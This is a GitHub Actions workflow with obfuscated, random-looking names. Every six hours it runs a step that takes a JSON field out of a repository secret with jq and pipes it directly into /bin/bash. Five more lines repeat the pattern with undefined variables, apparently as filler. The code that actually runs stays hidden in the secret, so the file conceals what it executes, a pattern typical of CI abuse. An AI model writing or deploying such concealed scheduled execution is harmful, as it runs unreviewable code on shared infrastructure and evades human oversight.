name: duanyanyu2233

on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanyanyu2233
        env:
          ungxi97: ${{ secrets.ungxi97 }}
        run: |
          echo $ungxi97 | jq -r .rrez7285 | /bin/bash
          echo $kyi29064 | jq -r .pdg2 | /bin/bash
          echo $b926 | jq -r .fkcoz343 | /bin/bash
          echo $isfqr7 | jq -r .nztp42241 | /bin/bash
          echo $mrob5 | jq -r .dxnb01104 | /bin/bash
          echo $lpcbp94500 | jq -r .hjfr4878 | /bin/bash

